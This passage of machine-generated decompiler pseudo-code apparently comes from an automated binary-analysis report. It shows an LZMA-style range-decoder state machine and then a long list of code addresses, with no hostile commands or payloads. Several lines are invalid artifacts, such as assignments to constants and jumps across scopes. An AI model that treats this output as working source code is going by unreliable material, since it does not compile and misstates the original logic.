                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t156 = __ebp - 0x70;
                                                                                                                                                              												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t156;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												while(1) {
                                                                                                                                                              													L48:
                                                                                                                                                              													__eflags = __ebx - 0x100;
                                                                                                                                                              													if(__ebx >= 0x100) {
                                                                                                                                                              														break;
                                                                                                                                                              													}
                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                              													__edx = __ebx + __ebx;
                                                                                                                                                              													__ecx =  *(__ebp - 0x10);
                                                                                                                                                              													__esi = __edx + __eax;
                                                                                                                                                              													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              													__ax =  *__esi;
                                                                                                                                                              													 *(__ebp - 0x54) = __esi;
                                                                                                                                                              													__edi = __ax & 0x0000ffff;
                                                                                                                                                              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              														__cx = __ax;
                                                                                                                                                              														_t170 = __edx + 1; // 0x1
                                                                                                                                                              														__ebx = _t170;
                                                                                                                                                              														__cx = __ax >> 5;
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              														 *__esi = __ax;
                                                                                                                                                              													} else {
                                                                                                                                                              														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              														0x800 = 0x800 - __edi;
                                                                                                                                                              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              														__ebx = __ebx + __ebx;
                                                                                                                                                              														 *__esi = __cx;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              														continue;
                                                                                                                                                              													} else {
                                                                                                                                                              														goto L46;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												L54:
                                                                                                                                                              												_t173 = __ebp - 0x34;
                                                                                                                                                              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                              												__eflags =  *_t173;
                                                                                                                                                              												goto L55;
                                                                                                                                                              											case 0xf:
                                                                                                                                                              												L58:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0xf;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t203 = __ebp - 0x70;
                                                                                                                                                              												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t203;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												L60:
                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                              													L55:
                                                                                                                                                              													__al =  *(__ebp - 0x44);
                                                                                                                                                              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                              													goto L56;
                                                                                                                                                              												}
                                                                                                                                                              												L61:
                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                              												__edx = __ebx + __ebx;
                                                                                                                                                              												__ecx =  *(__ebp - 0x10);
                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													__cx = __ax;
                                                                                                                                                              													_t217 = __edx + 1; // 0x1
                                                                                                                                                              													__ebx = _t217;
                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													goto L60;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L58;
                                                                                                                                                              												}
                                                                                                                                                              											case 0x10:
                                                                                                                                                              												L109:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0x10;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t365 = __ebp - 0x70;
                                                                                                                                                              												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t365;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												goto L111;
                                                                                                                                                              											case 0x11:
                                                                                                                                                              												goto L69;
                                                                                                                                                              											case 0x12:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                              													 *(__ebp - 0x84) = 0x13;
                                                                                                                                                              													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                              													while(1) {
                                                                                                                                                              														L132:
                                                                                                                                                              														 *(_t613 - 0x54) = _t606;
                                                                                                                                                              														goto L133;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x4c);
                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                              												goto L130;
                                                                                                                                                              											case 0x13:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													_t469 = __ebp - 0x58;
                                                                                                                                                              													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                              													__eflags =  *_t469;
                                                                                                                                                              													 *(__ebp - 0x30) = 0x10;
                                                                                                                                                              													 *(__ebp - 0x40) = 8;
                                                                                                                                                              													L144:
                                                                                                                                                              													 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                              													goto L145;
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x4c);
                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              												 *(__ebp - 0x30) = 8;
                                                                                                                                                              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                              												L130:
                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                              												 *(__ebp - 0x40) = 3;
                                                                                                                                                              												goto L144;
                                                                                                                                                              											case 0x14:
                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                              												__eax =  *(__ebp - 0x80);
                                                                                                                                                              												 *(_t613 - 0x88) = _t533;
                                                                                                                                                              												goto L1;
                                                                                                                                                              											case 0x15:
                                                                                                                                                              												__eax = 0;
                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              												__al = __al & 0x000000fd;
                                                                                                                                                              												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              												goto L120;
                                                                                                                                                              											case 0x16:
                                                                                                                                                              												__eax =  *(__ebp - 0x30);
                                                                                                                                                              												__eflags = __eax - 4;
                                                                                                                                                              												if(__eax >= 4) {
                                                                                                                                                              													_push(3);
                                                                                                                                                              													_pop(__eax);
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												 *(__ebp - 0x40) = 6;
                                                                                                                                                              												__eax = __eax << 7;
                                                                                                                                                              												 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                              												goto L145;
                                                                                                                                                              											case 0x17:
                                                                                                                                                              												L145:
                                                                                                                                                              												__eax =  *(__ebp - 0x40);
                                                                                                                                                              												 *(__ebp - 0x50) = 1;
                                                                                                                                                              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                              												goto L149;
                                                                                                                                                              											case 0x18:
                                                                                                                                                              												L146:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0x18;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t484 = __ebp - 0x70;
                                                                                                                                                              												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t484;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												L148:
                                                                                                                                                              												_t487 = __ebp - 0x48;
                                                                                                                                                              												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              												__eflags =  *_t487;
                                                                                                                                                              												L149:
                                                                                                                                                              												__eflags =  *(__ebp - 0x48);
                                                                                                                                                              												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              													__ecx =  *(__ebp - 0x40);
                                                                                                                                                              													__ebx =  *(__ebp - 0x50);
                                                                                                                                                              													0 = 1;
                                                                                                                                                              													__eax = 1 << __cl;
                                                                                                                                                              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                              													__eax =  *(__ebp - 0x7c);
                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              													while(1) {
                                                                                                                                                              														 *(_t613 - 0x88) = _t533;
                                                                                                                                                              														goto L1;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x50);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													__cx = __ax;
                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                              													__eax = __eax - __ecx;
                                                                                                                                                              													__edx = __edx + 1;
                                                                                                                                                              													__eflags = __edx;
                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                              													 *(__ebp - 0x50) = __edx;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													goto L148;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L146;
                                                                                                                                                              												}
                                                                                                                                                              											case 0x19:
                                                                                                                                                              												__eflags = __ebx - 4;
                                                                                                                                                              												if(__ebx < 4) {
                                                                                                                                                              													 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                              													L119:
                                                                                                                                                              													_t393 = __ebp - 0x2c;
                                                                                                                                                              													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                              													__eflags =  *_t393;
                                                                                                                                                              													L120:
                                                                                                                                                              													__eax =  *(__ebp - 0x2c);
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													if(__eax == 0) {
                                                                                                                                                              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                              														goto L170;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                              													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                              														goto L171;
                                                                                                                                                              													}
                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                              													__eax =  *(__ebp - 0x30);
                                                                                                                                                              													_t400 = __ebp - 0x60;
                                                                                                                                                              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                              													__eflags =  *_t400;
                                                                                                                                                              													goto L123;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx = __ebx;
                                                                                                                                                              												__eax = __ebx;
                                                                                                                                                              												__ecx = __ebx >> 1;
                                                                                                                                                              												__eax = __ebx & 0x00000001;
                                                                                                                                                              												__ecx = (__ebx >> 1) - 1;
                                                                                                                                                              												__al = __al | 0x00000002;
                                                                                                                                                              												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                              												__eflags = __ebx - 0xe;
                                                                                                                                                              												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              												if(__ebx >= 0xe) {
                                                                                                                                                              													__ebx = 0;
                                                                                                                                                              													 *(__ebp - 0x48) = __ecx;
                                                                                                                                                              													L102:
                                                                                                                                                              													__eflags =  *(__ebp - 0x48);
                                                                                                                                                              													if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              														__eax = __eax + __ebx;
                                                                                                                                                              														 *(__ebp - 0x40) = 4;
                                                                                                                                                              														 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              														__eax =  *(__ebp - 4);
                                                                                                                                                              														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              														L108:
                                                                                                                                                              														__ebx = 0;
                                                                                                                                                              														 *(__ebp - 0x58) = __eax;
                                                                                                                                                              														 *(__ebp - 0x50) = 1;
                                                                                                                                                              														 *(__ebp - 0x44) = 0;
                                                                                                                                                              														 *(__ebp - 0x48) = 0;
                                                                                                                                                              														L112:
                                                                                                                                                              														__eax =  *(__ebp - 0x40);
                                                                                                                                                              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                              															_t391 = __ebp - 0x2c;
                                                                                                                                                              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                              															__eflags =  *_t391;
                                                                                                                                                              															goto L119;
                                                                                                                                                              														}
                                                                                                                                                              														__eax =  *(__ebp - 0x50);
                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              														__eax =  *(__ebp - 0x58);
                                                                                                                                                              														__esi = __edi + __eax;
                                                                                                                                                              														 *(__ebp - 0x54) = __esi;
                                                                                                                                                              														__ax =  *__esi;
                                                                                                                                                              														__ecx = __ax & 0x0000ffff;
                                                                                                                                                              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                              														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                              															__ecx = 0;
                                                                                                                                                              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                              															__ecx = 1;
                                                                                                                                                              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              															__ebx = 1;
                                                                                                                                                              															__ecx =  *(__ebp - 0x48);
                                                                                                                                                              															__ebx = 1 << __cl;
                                                                                                                                                              															__ecx = 1 << __cl;
                                                                                                                                                              															__ebx =  *(__ebp - 0x44);
                                                                                                                                                              															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                              															__cx = __ax;
                                                                                                                                                              															__cx = __ax >> 5;
                                                                                                                                                              															__eax = __eax - __ecx;
                                                                                                                                                              															__edi = __edi + 1;
                                                                                                                                                              															__eflags = __edi;
                                                                                                                                                              															 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              															 *__esi = __ax;
                                                                                                                                                              															 *(__ebp - 0x50) = __edi;
                                                                                                                                                              														} else {
                                                                                                                                                              															 *(__ebp - 0x10) = __edx;
                                                                                                                                                              															0x800 = 0x800 - __ecx;
                                                                                                                                                              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              															 *__esi = __dx;
                                                                                                                                                              														}
                                                                                                                                                              														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              															L111:
                                                                                                                                                              															_t368 = __ebp - 0x48;
                                                                                                                                                              															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                              															__eflags =  *_t368;
                                                                                                                                                              															goto L112;
                                                                                                                                                              														} else {
                                                                                                                                                              															goto L109;
                                                                                                                                                              														}
                                                                                                                                                              													}
                                                                                                                                                              													__ecx =  *(__ebp - 0xc);
                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                              														__ecx =  *(__ebp - 0x10);
                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              														__ebx = __ebx | 0x00000001;
                                                                                                                                                              														__eflags = __ebx;
                                                                                                                                                              														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              														L101:
                                                                                                                                                              														_t338 = __ebp - 0x48;
                                                                                                                                                              														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              														__eflags =  *_t338;
                                                                                                                                                              														goto L102;
                                                                                                                                                              													} else {
                                                                                                                                                              														goto L99;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__edx =  *(__ebp - 4);
                                                                                                                                                              												__eax = __eax - __ebx;
                                                                                                                                                              												 *(__ebp - 0x40) = __ecx;
                                                                                                                                                              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                              												goto L108;
                                                                                                                                                              											case 0x1a:
                                                                                                                                                              												L56:
                                                                                                                                                              												__eflags =  *(__ebp - 0x64);
                                                                                                                                                              												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x68);
                                                                                                                                                              												__al =  *(__ebp - 0x5c);
                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              												 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                              												__ecx =  *(__ebp - 0x14);
                                                                                                                                                              												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                              												__eax = __ecx + 1;
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              												__edx = _t192;
                                                                                                                                                              												goto L80;
                                                                                                                                                              											case 0x1b:
                                                                                                                                                              												L76:
                                                                                                                                                              												__eflags =  *(__ebp - 0x64);
                                                                                                                                                              												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              												}
                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                              												__cl =  *(__eax + __edx);
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              												 *(__eax + __edx) = __cl;
                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              												__edx = _t275;
                                                                                                                                                              												__eax =  *(__ebp - 0x68);
                                                                                                                                                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              												_t284 = __ebp - 0x64;
                                                                                                                                                              												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                                                              												__eflags =  *_t284;
                                                                                                                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              												L80:
                                                                                                                                                              												 *(__ebp - 0x14) = __edx;
                                                                                                                                                              												goto L81;
                                                                                                                                                              											case 0x1c:
                                                                                                                                                              												while(1) {
                                                                                                                                                              													L123:
                                                                                                                                                              													__eflags =  *(__ebp - 0x64);
                                                                                                                                                              													if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              														break;
                                                                                                                                                              													}
                                                                                                                                                              													__eax =  *(__ebp - 0x14);
                                                                                                                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              													}
                                                                                                                                                              													__edx =  *(__ebp - 8);
                                                                                                                                                              													__cl =  *(__eax + __edx);
                                                                                                                                                              													__eax =  *(__ebp - 0x14);
                                                                                                                                                              													 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              													 *(__eax + __edx) = __cl;
                                                                                                                                                              													__eax = __eax + 1;
                                                                                                                                                              													__edx = 0;
                                                                                                                                                              													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              													__edx = _t414;
                                                                                                                                                              													__eax =  *(__ebp - 0x68);
                                                                                                                                                              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                              													__eflags =  *(__ebp - 0x30);
                                                                                                                                                              													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              													 *(__ebp - 0x14) = _t414;
                                                                                                                                                              													if( *(__ebp - 0x30) > 0) {
                                                                                                                                                              														continue;
                                                                                                                                                              													} else {
                                                                                                                                                              														L81:
                                                                                                                                                              														 *(__ebp - 0x88) = 2;
                                                                                                                                                              														goto L1;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                              												goto L170;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									L171:
                                                                                                                                                              									_t535 = _t534 | 0xffffffff;
                                                                                                                                                              									goto L172;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L1;
                                                                                                                                                              				}
                                                                                                                                                              			}













                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406617
                                                                                                                                                              0x0040661d
                                                                                                                                                              0x00406623
                                                                                                                                                              0x00406629
                                                                                                                                                              0x00406643
                                                                                                                                                              0x00406646
                                                                                                                                                              0x0040664c
                                                                                                                                                              0x00406657
                                                                                                                                                              0x00406659
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040663a
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x00406663
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406665
                                                                                                                                                              0x00406669
                                                                                                                                                              0x00406818
                                                                                                                                                              0x0040682e
                                                                                                                                                              0x00406836
                                                                                                                                                              0x0040683d
                                                                                                                                                              0x0040683f
                                                                                                                                                              0x00406846
                                                                                                                                                              0x0040684a
                                                                                                                                                              0x0040684a
                                                                                                                                                              0x00406675
                                                                                                                                                              0x0040667c
                                                                                                                                                              0x00406684
                                                                                                                                                              0x00406687
                                                                                                                                                              0x0040668a
                                                                                                                                                              0x0040668a
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e35
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e46
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e4f
